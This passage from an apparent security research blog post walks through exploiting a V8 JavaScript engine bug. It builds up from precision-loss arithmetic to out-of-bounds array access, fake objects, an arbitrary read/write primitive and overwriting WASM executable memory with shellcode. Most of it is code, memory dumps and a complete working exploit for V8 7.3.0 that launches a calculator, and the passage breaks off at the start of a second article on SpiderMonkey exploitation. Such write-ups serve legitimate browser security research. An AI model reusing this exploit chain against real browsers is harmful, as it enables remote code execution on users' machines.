d8> var x = Number.MAX_SAFE_INTEGER + 1
undefined
d8> x + sum
27035996273704904
d8> x + 007199254740989 + 9007199254740966 + 007199254740989 + 9007199254740966
27035996273704896
d8> 27035996273704904 - 27035996273704896
8


Now we get a delta of 8.

Or maybe we could amplify even more the precision loss using other operators?

d8> var x = Number.MAX_SAFE_INTEGER + 1
undefined
d8> 10 * (x + 1 + 1)
90071992547409920
d8> 10 * (x + 2)
90071992547409940


That gives us a delta of 20 because precision_loss * 10 = 20 and the precision loss is of 2.

Step 0 : Corrupting a FixedDoubleArray

First, we want to observe the memory layout to know what we are leaking and what we want to overwrite exactly. For that, I simply use my custom %DumpObjects v8 runtime function. Also, I use an ArrayBuffer with two views: one Float64Array and one BigUint64Array to easily convert between 64 bits floats and 64 bits integers.

let ab = new ArrayBuffer(8);
let fv = new Float64Array(ab);
let dv = new BigUint64Array(ab);

let f2i = (f) => {
fv[0] = f;
return dv[0];
}

let hexprintablei = (i) => {
}

let debug = (x,z, leak) => {
print("oob index is " + z);
print("length is " + x.length);
print("leaked 0x" + hexprintablei(f2i(leak)));
%DumpObjects(x,13); // 23 & 3 to dump the jsarray's elements
};

let opt_me = (x) => {
let arr = new Array(1.1,1.2,1.3);
arr2 = new Array(42.1,42.0,42.0);
let y = (x == "foo") ? 4503599627370495 : 4503599627370493;
let z = 2 + y + y ; // 2 + 4503599627370495 * 2 = 9007199254740992
z = z + 1 + 1;
z = z - (4503599627370495*2);
let leak = arr[z];
if (x == "foo")
debug(arr,z, leak);
return leak;
}

opt_me("");
%OptimizeFunctionOnNextCall(opt_me);
let res = opt_me("foo");


That gives the following results :

oob index is 4
length is 3
leaked 0x0000000300000000
----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] -----
0x00002e5fddf8b6a8    0x00002af7fe681451    MAP_TYPE
0x00002e5fddf8b6b0    0x0000000300000000
0x00002e5fddf8b6b8    0x3ff199999999999a    arr[0]
0x00002e5fddf8b6c0    0x3ff3333333333333    arr[1]
0x00002e5fddf8b6c8    0x3ff4cccccccccccd    arr[2]
----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] -----
0x00002e5fddf8b6d0    0x00002af7fe681451    MAP_TYPE // also arr[3]
0x00002e5fddf8b6d8    0x0000000300000000    arr[4] with OOB index!
0x00002e5fddf8b6e0    0x40450ccccccccccd    arr2[0] == 42.1
0x00002e5fddf8b6e8    0x4045000000000000    arr2[1] == 42.0
0x00002e5fddf8b6f0    0x4045000000000000
----- [ JS_ARRAY_TYPE : 0x20 ] -----
0x00002e5fddf8b6f8    0x0000290fb3502cf1    MAP_TYPE    arr2 JSArray
0x00002e5fddf8b700    0x00002af7fe680c19    FIXED_ARRAY_TYPE [as]
0x00002e5fddf8b708    0x00002e5fddf8b6d1    FIXED_DOUBLE_ARRAY_TYPE


Obviously, both FixedDoubleArray of arr and arr2 are contiguous. At arr[3] we've got arr2's map and at arr[4] we've got arr2's elements length (encoded as an Smi, which is 32 bits even on 64 bit platforms). Please note that we changed a little bit the trigger code :

< let arr = new Array(1.1,1.2,1.3,1.4);
---
> let arr = new Array(1.1,1.2,1.3);


Otherwise we would read/write the map instead, as demonstrates the following dump :

oob index is 4
length is 4
leaked 0x0000057520401451
----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x30 ] -----
0x0000108bcf50b6c0    0x0000057520401451    MAP_TYPE
0x0000108bcf50b6c8    0x0000000400000000
0x0000108bcf50b6d0    0x3ff199999999999a    arr[0] == 1.1
0x0000108bcf50b6d8    0x3ff3333333333333    arr[1]
0x0000108bcf50b6e0    0x3ff4cccccccccccd    arr[2]
0x0000108bcf50b6e8    0x3ff6666666666666    arr[3] == 1.3
----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] -----
0x0000108bcf50b6f0    0x0000057520401451    MAP_TYPE    arr[4] with OOB index!
0x0000108bcf50b6f8    0x0000000300000000
0x0000108bcf50b700    0x40450ccccccccccd
0x0000108bcf50b708    0x4045000000000000
0x0000108bcf50b710    0x4045000000000000
----- [ JS_ARRAY_TYPE : 0x20 ] -----
0x0000108bcf50b718    0x00001dd08d482cf1    MAP_TYPE
0x0000108bcf50b720    0x0000057520400c19    FIXED_ARRAY_TYPE


Step 1 : Corrupting a JSArray and leaking an ArrayBuffer's backing store

The problem with step 0 is that we merely overwrite the FixedDoubleArray's length ... which is pretty useless because it is not the field actually controlling the JSArray’s length the way we expect it, it just gives information about the memory allocated for the fixed array. Actually, the only length we want to corrupt is the one from the JSArray.

Indeed, the length of the JSArray is not necessarily the same as the length of the underlying FixedArray (or FixedDoubleArray). Let's quickly check that.

d8> let a = new Array(0);
undefined
d8> a.push(1);
1
d8> %DebugPrint(a)
DebugPrint: 0xd893a90aed1: [JSArray]
- map: 0x18bbbe002ca1 <Map(HOLEY_SMI_ELEMENTS)> [FastProperties]
- prototype: 0x1cf26798fdb1 <JSArray[0]>
- elements: 0x0d893a90d1c9 <FixedArray[17]> [HOLEY_SMI_ELEMENTS]
- length: 1
- properties: 0x367210500c19 <FixedArray[0]> {
#length: 0x0091daa801a1 <AccessorInfo> (const accessor descriptor)
}
- elements: 0x0d893a90d1c9 <FixedArray[17]> {
0: 1
1-16: 0x3672105005a9 <the_hole>
}


In this case, even though the length of the JSArray is 1, the underlying FixedArray as a length of 17, which is just fine! But that is something that you want to keep in mind.

If you want to get an OOB R/W primitive that's the JSArray's length that you want to overwrite. Also if you were to have an out-of-bounds access on such an array, you may want to check that the size of the underlying fixed array is not too big. So, let's tweak a bit our code to target the JSArray's length!

If you look at the memory dump, you may think that having the allocated JSArray before the FixedDoubleArray mightbe convenient, right?

Right now the layout is:

FIXED_DOUBLE_ARRAY_TYPE
FIXED_DOUBLE_ARRAY_TYPE
JS_ARRAY_TYPE


Let's simply change the way we are allocating the second array.

23c23
<   arr2 = new Array(42.1,42.0,42.0);
---
>   arr2 = Array.of(42.1,42.0,42.0);


Now we have the following layout

FIXED_DOUBLE_ARRAY_TYPE
JS_ARRAY_TYPE
FIXED_DOUBLE_ARRAY_TYPE

oob index is 4
length is 3
leaked 0x000009d6e6600c19
----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] -----
----- [ JS_ARRAY_TYPE : 0x20 ] -----


Cool, now we are able to access the JSArray instead of the FixedDoubleArray. However, we're accessing its properties field.

Thanks to the precision loss when transforming +1+1 into +2 we get a difference of 2 between the computations. If we get a difference of 4, we'll be at the right offset. Transforming +1+1+1 into +3 will give us this!

d8> x + 1 + 1 + 1
9007199254740992
d8> x + 3
9007199254740996

26c26
<   z = z + 1 + 1;
---
>   z = z + 1 + 1 + 1;


Now we are able to read/write the JSArray's length.

oob index is 6
length is 3
leaked 0x0000000300000000
----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] -----
0x000004144950b6e0    0x00001b7451b01451    MAP_TYPE
0x000004144950b6e8    0x0000000300000000
0x000004144950b6f0    0x3ff199999999999a    // arr[0]
0x000004144950b6f8    0x3ff3333333333333
0x000004144950b700    0x3ff4cccccccccccd
----- [ JS_ARRAY_TYPE : 0x20 ] -----
0x000004144950b708    0x0000285651602d41    MAP_TYPE
0x000004144950b710    0x00001b7451b00c19    FIXED_ARRAY_TYPE
0x000004144950b718    0x000004144950b751    FIXED_DOUBLE_ARRAY_TYPE
0x000004144950b720    0x0000000300000000    // arr[6]


Now to leak the ArrayBuffer's data, it's very easy. Just allocate it right after the second JSArray.

let arr = new Array(MAGIC,MAGIC,MAGIC);
arr2 = Array.of(1.2); // allows to put the JSArray *before* the fixed arrays
ab = new ArrayBuffer(AB_LENGTH);


This way, we get the following memory layout :

----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] -----
0x00003a4d7608bb48    0x000023fe25c01451    MAP_TYPE
0x00003a4d7608bb50    0x0000000300000000
0x00003a4d7608bb58    0x3ff199999999999a    arr[0]
0x00003a4d7608bb60    0x3ff199999999999a
0x00003a4d7608bb68    0x3ff199999999999a
----- [ JS_ARRAY_TYPE : 0x20 ] -----
0x00003a4d7608bb70    0x000034dc44482d41    MAP_TYPE
0x00003a4d7608bb78    0x000023fe25c00c19    FIXED_ARRAY_TYPE
0x00003a4d7608bb80    0x00003a4d7608bba9    FIXED_DOUBLE_ARRAY_TYPE
0x00003a4d7608bb88    0x0000006400000000
----- [ FIXED_ARRAY_TYPE : 0x18 ] -----
0x00003a4d7608bb90    0x000023fe25c007a9    MAP_TYPE
0x00003a4d7608bb98    0x0000000100000000
0x00003a4d7608bba0    0x000023fe25c005a9    ODDBALL_TYPE
----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x18 ] -----
0x00003a4d7608bba8    0x000023fe25c01451    MAP_TYPE
0x00003a4d7608bbb0    0x0000000100000000
0x00003a4d7608bbb8    0x3ff3333333333333    arr2[0]
----- [ JS_ARRAY_BUFFER_TYPE : 0x40 ] -----
0x00003a4d7608bbc0    0x000034dc444821b1    MAP_TYPE
0x00003a4d7608bbc8    0x000023fe25c00c19    FIXED_ARRAY_TYPE
0x00003a4d7608bbd0    0x000023fe25c00c19    FIXED_ARRAY_TYPE
0x00003a4d7608bbd8    0x0000000000000100
0x00003a4d7608bbe0    0x0000556b8fdaea00    ab's backing_store pointer!
0x00003a4d7608bbe8    0x0000000000000002
0x00003a4d7608bbf0    0x0000000000000000
0x00003a4d7608bbf8    0x0000000000000000


We can simply use the corrupted JSArray (arr2) to read the ArrayBuffer (ab). This will be useful later because memory pointed to by the backing_store is fully controlled by us, as we can put arbitrary data in it, through a data view (like a Uint32Array).

Now that we know a pointer to some fully controlled content, let's go to step 2!

Step 2 : Getting a fake object

Arrays of PACKED_ELEMENTS can contain tagged pointers to JavaScript objects. For those unfamiliar with v8, the elements kind of a JsArray in v8 gives information about the type of elements it is storing. Read this if you want to know more about elements kind.

d8> var objects = new Array(new Object())
d8> %DebugPrint(objects)
DebugPrint: 0xd79e750aee9: [JSArray]
- elements: 0x0d79e750af19 <FixedArray[1]> {
0: 0x0d79e750aeb1 <Object map = 0x19c550d80451>
}
0x19c550d82d91: [Map]
- elements kind: PACKED_ELEMENTS


Therefore if you can corrupt the content of an array of PACKED_ELEMENTS, you can put in a pointer to a crafted object. This is basically the idea behind the fakeobj primitive. The idea is to simply put the address backing_store+1 in this array (the original pointer is not tagged, v8 expect pointers to JavaScript objects to be tagged). Let's first simply write the value 0x4141414141 in the controlled memory.

Indeed, we know that the very first field of any object is a a pointer to a map (long story short, the map is the object that describes the type of the object. Other engines call it a Shape or a Structure. If you want to know more, just read the previous post on SpiderMonkey or this blog post).

Therefore, if v8 indeed considers our pointer as an object pointer, when trying to use it, we should expect a crash when dereferencing the map.

Achieving this is as easy as allocating an array with an object pointer, looking for the index to the object pointer, and replacing it by the (tagged) pointer to the previously leaked backing_store.

let arr = new Array(MAGIC,MAGIC,MAGIC);
arr2 = Array.of(1.2); // allows to put the JSArray *before* the fixed arrays
evil_ab = new ArrayBuffer(AB_LENGTH);
packed_elements_array = Array.of(MARK1SMI,Math,MARK2SMI);


Quickly check the memory layout.

----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] -----
0x0000220f2ec82410    0x0000353622a01451    MAP_TYPE
0x0000220f2ec82418    0x0000000300000000
0x0000220f2ec82420    0x3ff199999999999a
0x0000220f2ec82428    0x3ff199999999999a
0x0000220f2ec82430    0x3ff199999999999a
----- [ JS_ARRAY_TYPE : 0x20 ] -----
0x0000220f2ec82438    0x0000261a44682d41    MAP_TYPE
0x0000220f2ec82440    0x0000353622a00c19    FIXED_ARRAY_TYPE
0x0000220f2ec82448    0x0000220f2ec82471    FIXED_DOUBLE_ARRAY_TYPE
0x0000220f2ec82450    0x0000006400000000
----- [ FIXED_ARRAY_TYPE : 0x18 ] -----
0x0000220f2ec82458    0x0000353622a007a9    MAP_TYPE
0x0000220f2ec82460    0x0000000100000000
0x0000220f2ec82468    0x0000353622a005a9    ODDBALL_TYPE
----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x18 ] -----
0x0000220f2ec82470    0x0000353622a01451    MAP_TYPE
0x0000220f2ec82478    0x0000000100000000
0x0000220f2ec82480    0x3ff3333333333333
----- [ JS_ARRAY_BUFFER_TYPE : 0x40 ] -----
0x0000220f2ec82488    0x0000261a446821b1    MAP_TYPE
0x0000220f2ec82490    0x0000353622a00c19    FIXED_ARRAY_TYPE
0x0000220f2ec82498    0x0000353622a00c19    FIXED_ARRAY_TYPE
0x0000220f2ec824a0    0x0000000000000100
0x0000220f2ec824a8    0x00005599e4b21f40
0x0000220f2ec824b0    0x0000000000000002
0x0000220f2ec824b8    0x0000000000000000
0x0000220f2ec824c0    0x0000000000000000
----- [ JS_ARRAY_TYPE : 0x20 ] -----
0x0000220f2ec824c8    0x0000261a44682de1    MAP_TYPE
0x0000220f2ec824d0    0x0000353622a00c19    FIXED_ARRAY_TYPE
0x0000220f2ec824d8    0x0000220f2ec824e9    FIXED_ARRAY_TYPE
0x0000220f2ec824e0    0x0000000300000000
----- [ FIXED_ARRAY_TYPE : 0x28 ] -----
0x0000220f2ec824e8    0x0000353622a007a9    MAP_TYPE
0x0000220f2ec824f0    0x0000000300000000
0x0000220f2ec824f8    0x0000001300000000    // MARK 1 for memory scanning
0x0000220f2ec82500    0x00002f3befd86b81    JS_OBJECT_TYPE
0x0000220f2ec82508    0x0000003700000000    // MARK 2 for memory scanning


Good, the FixedArray with the pointer to the Math object is located right after the ArrayBuffer. Observe that we put markers so as to scan memory instead of hardcoding offsets (which would be bad if we were to have a different memory layout for whatever reason).

After locating the (oob) index to the object pointer, simply overwrite it and use it.

let view = new BigUint64Array(evil_ab);
view[0] = 0x414141414141n; // initialize the fake object with this value as a map pointer
// ...
arr2[index_to_object_pointer] = tagFloat(fbackingstore_ptr);
packed_elements_array[1].x; // crash on 0x414141414141 because it is used as a map pointer


Et voilà!

Step 3 : Arbitrary read/write primitive

Going from step 2 to step 3 is fairly easy. We just need our ArrayBuffer to contain data that look like an actual object. More specifically, we would like to craft an ArrayBuffer with a controlled backing_store pointer. You can also directly corrupt the existing ArrayBuffer to make it point to arbitrary memory. Your call!

Don't forget to choose a length that is big enough for the data you plan to write (most likely, your shellcode).

let view = new BigUint64Array(evil_ab);
for (let i = 0; i < ARRAYBUFFER_SIZE / PTR_SIZE; ++i) {
view[i] = f2i(arr2[ab_len_idx-3+i]);
if (view[i] > 0x10000 && !(view[i] & 1n))
view[i] = 0x42424242n; // backing_store
}
// [...]
arr2[magic_mark_idx+1] = tagFloat(fbackingstore_ptr); // object pointer
// [...]
let rw_view = new Uint32Array(packed_elements_array[1]);
rw_view[0] = 0x1337; // *0x42424242 = 0x1337


You should get a crash like this.

d8 rw.js [+] corrupted JSArray's length [+] Found backingstore pointer : 0000555c593d9890 Received signal 11 SEGV_MAPERR 000042424242 ==== C stack trace =============================== [0x555c577b81a4] [0x7ffa0331a390] [0x555c5711b4ae] [0x555c5728c967] [0x555c572dc50f] [0x555c572dbea5] [0x555c572dbc55] [0x555c57431254] [0x555c572102fc] [0x555c57215f66] [0x555c576fadeb] [end of stack trace]  Step 4 : Overwriting WASM RWX memory Now that's we've got an arbitrary read/write primitive, we simply want to overwrite RWX memory, put a shellcode in it and call it. We'd rather not do any kind of ROP or JIT code reuse(0vercl0k did this for SpiderMonkey). V8 used to have the JIT'ed code of its JSFunction located in RWX memory. But this is not the case anymore. However, as Andrea Biondo showed on his blog, WASM is still using RWX memory. All you have to do is to instantiate a WASM module and from one of its function, simply find the WASM instance object that contains a pointer to the RWX memory in its field JumpTableStart. Plan of action: 1. Read the JSFunction's shared function info 2. Get the WASM exported function from the shared function info 3. Get the WASM instance from the exported function 4. Read the JumpTableStart field from the WASM instance As I mentioned above, I use a modified v8 engine for which I implemented a %DumpObjects feature that prints an annotated memory dump. It allows to very easily understand how to get from a WASM JS function to the JumpTableStart pointer. I put some code here (Use it at your own risks as it might crash sometimes). Also, depending on your current checkout, the code may not be compatible and you will probably need to tweak it. %DumpObjects will pinpoint the pointer like this: ----- [ WASM_INSTANCE_TYPE : 0x118 : REFERENCES RWX MEMORY] ----- [...] 0x00002fac7911ec20 0x0000087e7c50a000 JumpTableStart [RWX]  So let's just find the RWX memory from a WASM function. sample_wasm.js can be found here. d8> load("sample_wasm.js") d8> %DumpObjects(global_test,10) ----- [ JS_FUNCTION_TYPE : 0x38 ] ----- 0x00002fac7911ed10 0x00001024ebc84191 MAP_TYPE 0x00002fac7911ed18 0x00000cdfc0080c19 FIXED_ARRAY_TYPE 0x00002fac7911ed20 0x00000cdfc0080c19 FIXED_ARRAY_TYPE 0x00002fac7911ed28 0x00002fac7911ecd9 SHARED_FUNCTION_INFO_TYPE 0x00002fac7911ed30 0x00002fac79101741 NATIVE_CONTEXT_TYPE 0x00002fac7911ed38 0x00000d1caca00691 FEEDBACK_CELL_TYPE 0x00002fac7911ed40 0x00002dc28a002001 CODE_TYPE ----- [ TRANSITION_ARRAY_TYPE : 0x30 ] ----- 0x00002fac7911ed48 0x00000cdfc0080b69 MAP_TYPE 0x00002fac7911ed50 0x0000000400000000 0x00002fac7911ed58 0x0000000000000000 function 1() { [native code] }  d8> %DumpObjects(0x00002fac7911ecd9,11) ----- [ SHARED_FUNCTION_INFO_TYPE : 0x38 ] ----- 0x00002fac7911ecd8 0x00000cdfc0080989 MAP_TYPE 0x00002fac7911ece0 0x00002fac7911ecb1 WASM_EXPORTED_FUNCTION_DATA_TYPE 0x00002fac7911ece8 0x00000cdfc00842c1 ONE_BYTE_INTERNALIZED_STRING_TYPE 0x00002fac7911ecf0 0x00000cdfc0082ad1 FEEDBACK_METADATA_TYPE 0x00002fac7911ecf8 0x00000cdfc00804c9 ODDBALL_TYPE 0x00002fac7911ed00 0x000000000000004f 0x00002fac7911ed08 0x000000000000ff00 ----- [ JS_FUNCTION_TYPE : 0x38 ] ----- 0x00002fac7911ed10 0x00001024ebc84191 MAP_TYPE 0x00002fac7911ed18 0x00000cdfc0080c19 FIXED_ARRAY_TYPE 0x00002fac7911ed20 0x00000cdfc0080c19 FIXED_ARRAY_TYPE 0x00002fac7911ed28 0x00002fac7911ecd9 SHARED_FUNCTION_INFO_TYPE 52417812098265  d8> %DumpObjects(0x00002fac7911ecb1,11) ----- [ WASM_EXPORTED_FUNCTION_DATA_TYPE : 0x28 ] ----- 0x00002fac7911ecb0 0x00000cdfc00857a9 MAP_TYPE 0x00002fac7911ecb8 0x00002dc28a002001 CODE_TYPE 0x00002fac7911ecc0 0x00002fac7911eb29 WASM_INSTANCE_TYPE 0x00002fac7911ecc8 0x0000000000000000 0x00002fac7911ecd0 0x0000000100000000 ----- [ SHARED_FUNCTION_INFO_TYPE : 0x38 ] ----- 0x00002fac7911ecd8 0x00000cdfc0080989 MAP_TYPE 0x00002fac7911ece0 0x00002fac7911ecb1 WASM_EXPORTED_FUNCTION_DATA_TYPE 0x00002fac7911ece8 0x00000cdfc00842c1 ONE_BYTE_INTERNALIZED_STRING_TYPE 0x00002fac7911ecf0 0x00000cdfc0082ad1 FEEDBACK_METADATA_TYPE 0x00002fac7911ecf8 0x00000cdfc00804c9 ODDBALL_TYPE 0x00002fac7911ed00 0x000000000000004f 52417812098225  d8> %DumpObjects(0x00002fac7911eb29,41) ----- [ WASM_INSTANCE_TYPE : 0x118 : REFERENCES RWX MEMORY] ----- 0x00002fac7911eb28 0x00001024ebc89411 MAP_TYPE 0x00002fac7911eb30 0x00000cdfc0080c19 FIXED_ARRAY_TYPE 0x00002fac7911eb38 0x00000cdfc0080c19 FIXED_ARRAY_TYPE 0x00002fac7911eb40 0x00002073d820bac1 WASM_MODULE_TYPE 0x00002fac7911eb48 0x00002073d820bcf1 JS_OBJECT_TYPE 0x00002fac7911eb50 0x00002fac79101741 NATIVE_CONTEXT_TYPE 0x00002fac7911eb58 0x00002fac7911ec59 WASM_MEMORY_TYPE 0x00002fac7911eb60 0x00000cdfc00804c9 ODDBALL_TYPE 0x00002fac7911eb68 0x00000cdfc00804c9 ODDBALL_TYPE 0x00002fac7911eb70 0x00000cdfc00804c9 ODDBALL_TYPE 0x00002fac7911eb78 0x00000cdfc00804c9 ODDBALL_TYPE 0x00002fac7911eb80 0x00000cdfc00804c9 ODDBALL_TYPE 0x00002fac7911eb88 0x00002073d820bc79 FIXED_ARRAY_TYPE 0x00002fac7911eb90 0x00000cdfc00804c9 ODDBALL_TYPE 0x00002fac7911eb98 0x00002073d820bc69 FOREIGN_TYPE 0x00002fac7911eba0 0x00000cdfc00804c9 ODDBALL_TYPE 0x00002fac7911eba8 0x00000cdfc00804c9 ODDBALL_TYPE 0x00002fac7911ebb0 0x00000cdfc00801d1 ODDBALL_TYPE 0x00002fac7911ebb8 0x00002dc289f94d21 CODE_TYPE 0x00002fac7911ebc0 0x0000000000000000 0x00002fac7911ebc8 0x00007f9f9cf60000 0x00002fac7911ebd0 0x0000000000010000 0x00002fac7911ebd8 0x000000000000ffff 0x00002fac7911ebe0 0x0000556b3a3e0c00 0x00002fac7911ebe8 0x0000556b3a3ea630 0x00002fac7911ebf0 0x0000556b3a3ea620 0x00002fac7911ebf8 0x0000556b3a47c210 0x00002fac7911ec00 0x0000000000000000 0x00002fac7911ec08 0x0000556b3a47c230 0x00002fac7911ec10 0x0000000000000000 0x00002fac7911ec18 0x0000000000000000 0x00002fac7911ec20 0x0000087e7c50a000 JumpTableStart [RWX] 0x00002fac7911ec28 0x0000556b3a47c250 0x00002fac7911ec30 0x0000556b3a47afa0 0x00002fac7911ec38 0x0000556b3a47afc0 ----- [ TUPLE2_TYPE : 0x18 ] ----- 0x00002fac7911ec40 0x00000cdfc00827c9 MAP_TYPE 0x00002fac7911ec48 0x00002fac7911eb29 WASM_INSTANCE_TYPE 0x00002fac7911ec50 0x00002073d820b849 JS_FUNCTION_TYPE ----- [ WASM_MEMORY_TYPE : 0x30 ] ----- 0x00002fac7911ec58 0x00001024ebc89e11 MAP_TYPE 0x00002fac7911ec60 0x00000cdfc0080c19 FIXED_ARRAY_TYPE 0x00002fac7911ec68 0x00000cdfc0080c19 FIXED_ARRAY_TYPE 52417812097833  That gives us the following offsets: let WasmOffsets = { shared_function_info : 3, wasm_exported_function_data : 1, wasm_instance : 2, jump_table_start : 31 };  Now simply find the JumpTableStart pointer and modify your crafted ArrayBuffer to overwrite this memory and copy your shellcode in it. Of course, you may want to backup the memory before so as to restore it after! Full exploit The full exploit looks like this: // spawn gnome calculator let shellcode = [0xe8, 0x00, 0x00, 0x00, 0x00, 0x41, 0x59, 0x49, 0x81, 0xe9, 0x05, 0x00, 0x00, 0x00, 0xb8, 0x01, 0x01, 0x00, 0x00, 0xbf, 0x6b, 0x00, 0x00, 0x00, 0x49, 0x8d, 0xb1, 0x61, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x20, 0x00, 0x0f, 0x05, 0x48, 0x89, 0xc7, 0xb8, 0x51, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x49, 0x8d, 0xb9, 0x62, 0x00, 0x00, 0x00, 0xb8, 0xa1, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xb8, 0x3b, 0x00, 0x00, 0x00, 0x49, 0x8d, 0xb9, 0x64, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x57, 0x48, 0x89, 0xe6, 0x49, 0x8d, 0x91, 0x7e, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x52, 0x48, 0x89, 0xe2, 0x0f, 0x05, 0xeb, 0xfe, 0x2e, 0x2e, 0x00, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x67, 0x6e, 0x6f, 0x6d, 0x65, 0x2d, 0x63, 0x61, 0x6c, 0x63, 0x75, 0x6c, 0x61, 0x74, 0x6f, 0x72, 0x00, 0x44, 0x49, 0x53, 0x50, 0x4c, 0x41, 0x59, 0x3d, 0x3a, 0x30, 0x00]; let WasmOffsets = { shared_function_info : 3, wasm_exported_function_data : 1, wasm_instance : 2, jump_table_start : 31 }; let log = this.print; let ab = new ArrayBuffer(8); let fv = new Float64Array(ab); let dv = new BigUint64Array(ab); let f2i = (f) => { fv[0] = f; return dv[0]; } let i2f = (i) => { dv[0] = BigInt(i); return fv[0]; } let tagFloat = (f) => { fv[0] = f; dv[0] += 1n; return fv[0]; } let hexprintablei = (i) => { return (i).toString(16).padStart(16,"0"); } let assert = (l,r,m) => { if (l != r) { log(hexprintablei(l) + " != " + hexprintablei(r)); log(m); throw "failed assert"; } return true; } let NEW_LENGTHSMI = 0x64; let NEW_LENGTH64 = 0x0000006400000000; let AB_LENGTH = 0x100; let MARK1SMI = 0x13; let MARK2SMI = 0x37; let MARK1 = 0x0000001300000000; let MARK2 = 0x0000003700000000; let ARRAYBUFFER_SIZE = 0x40; let PTR_SIZE = 8; let opt_me = (x) => { let MAGIC = 1.1; // don't move out of scope let arr = new Array(MAGIC,MAGIC,MAGIC); arr2 = Array.of(1.2); // allows to put the JSArray *before* the fixed arrays evil_ab = new ArrayBuffer(AB_LENGTH); packed_elements_array = Array.of(MARK1SMI,Math,MARK2SMI, get_pwnd); let y = (x == "foo") ? 4503599627370495 : 4503599627370493; let z = 2 + y + y ; // 2 + 4503599627370495 * 2 = 9007199254740992 z = z + 1 + 1 + 1; z = z - (4503599627370495*2); // may trigger the OOB R/W let leak = arr[z]; arr[z] = i2f(NEW_LENGTH64); // try to corrupt arr2.length // when leak == MAGIC, we are ready to exploit if (leak != MAGIC) { // [1] we should have corrupted arr2.length, we want to check it assert(f2i(leak), 0x0000000100000000, "bad layout for jsarray length corruption"); assert(arr2.length, NEW_LENGTHSMI); log("[+] corrupted JSArray's length"); // [2] now read evil_ab ArrayBuffer structure to prepare our fake array buffer let ab_len_idx = arr2.indexOf(i2f(AB_LENGTH)); // check if the memory layout is consistent assert(ab_len_idx != -1, true, "could not find array buffer"); assert(Number(f2i(arr2[ab_len_idx + 1])) & 1, false); assert(Number(f2i(arr2[ab_len_idx + 1])) > 0x10000, true); assert(f2i(arr2[ab_len_idx + 2]), 2); let ibackingstore_ptr = f2i(arr2[ab_len_idx + 1]); let fbackingstore_ptr = arr2[ab_len_idx + 1]; // copy the array buffer so as to prepare a good looking fake array buffer let view = new BigUint64Array(evil_ab); for (let i = 0; i < ARRAYBUFFER_SIZE / PTR_SIZE; ++i) { view[i] = f2i(arr2[ab_len_idx-3+i]); } log("[+] Found backingstore pointer : " + hexprintablei(ibackingstore_ptr)); // [3] corrupt packed_elements_array to replace the pointer to the Math object // by a pointer to our fake object located in our evil_ab array buffer let magic_mark_idx = arr2.indexOf(i2f(MARK1)); assert(magic_mark_idx != -1, true, "could not find object pointer mark"); assert(f2i(arr2[magic_mark_idx+2]) == MARK2, true); arr2[magic_mark_idx+1] = tagFloat(fbackingstore_ptr); // [4] leak wasm function pointer let ftagged_wasm_func_ptr = arr2[magic_mark_idx+3]; // we want to read get_pwnd log("[+] wasm function pointer at 0x" + hexprintablei(f2i(ftagged_wasm_func_ptr))); view[4] = f2i(ftagged_wasm_func_ptr)-1n; // [5] use RW primitive to find WASM RWX memory let rw_view = new BigUint64Array(packed_elements_array[1]); let shared_function_info = rw_view[WasmOffsets.shared_function_info]; view[4] = shared_function_info - 1n; // detag pointer rw_view = new BigUint64Array(packed_elements_array[1]); let wasm_exported_function_data = rw_view[WasmOffsets.wasm_exported_function_data]; view[4] = wasm_exported_function_data - 1n; // detag rw_view = new BigUint64Array(packed_elements_array[1]); let wasm_instance = rw_view[WasmOffsets.wasm_instance]; view[4] = wasm_instance - 1n; // detag rw_view = new BigUint64Array(packed_elements_array[1]); let jump_table_start = rw_view[WasmOffsets.jump_table_start]; // detag assert(jump_table_start > 0x10000n, true); assert(jump_table_start & 0xfffn, 0n); // should look like an aligned pointer log("[+] found RWX memory at 0x" + jump_table_start.toString(16)); view[4] = jump_table_start; rw_view = new Uint8Array(packed_elements_array[1]); // [6] write shellcode in RWX memory for (let i = 0; i < shellcode.length; ++i) { rw_view[i] = shellcode[i]; } // [7] PWND! let res = get_pwnd(); print(res); } return leak; } (() => { assert(this.alert, undefined); // only v8 is supported assert(this.version().includes("7.3.0"), true); // only tested on version 7.3.0 // exploit is the same for both windows and linux, only shellcodes have to be changed // architecture is expected to be 64 bits })() // needed for RWX memory load("wasm.js"); opt_me(""); for (var i = 0; i < 0x10000; ++i) // trigger optimization opt_me(""); let res = opt_me("foo");  Conclusion I hope you enjoyed this article and thank you very much for reading :-) If you have any feedback or questions, just contact me on my twitter @__x86. Special thanks to my friends 0vercl0k and yrp604 for their review! Kudos to the awesome v8 team. You guys are doing amazing work! Recommended reading Introduction to SpiderMonkey exploitation. 19 November 2018 at 16:25 Introduction This blogpost covers the development of three exploits targeting SpiderMonkey JavaScript Shell interpreter and Mozilla Firefox on Windows 10 RS5 64-bit from the perspective of somebody that has never written a browser exploit nor looked closely at any JavaScript engine codebase. As you have probably noticed, there has been a LOT of interest in exploiting browsers in the past year or two. Every major CTF competition has at least one browser challenge, every month there are at least a write-up or two touching on browser exploitation. It is just everywhere. That is kind of why I figured I should have a little look at what a JavaScript engine is like from inside the guts, and exploit one of them. I have picked Firefox's SpiderMonkey JavaScript engine and the challenge Blazefox that has been written by itszn13. In this blogpost, I present my findings and the three exploits I have written during this quest. Originally, the challenge was targeting a Linux x64 environment and so naturally I decided to exploit it on Windows x64 :). Now you may wonder why three different exploits? Three different exploits allowed me to take it step by step and not face all the complexity at once. That is usually how I work day to day, I make something small work and iterate to build it up. Here is how I organized things: • The first thing I wrote is a WinDbg JavaScript extension called sm.js that gives me visibility into a bunch of stuff in SpiderMonkey. It is also a good exercise to familiarize yourself with the various ways objects are organized in memory. It is not necessary, but it has been definitely useful when writing the exploits. • The first exploit, basic.js, targets a very specific build of the 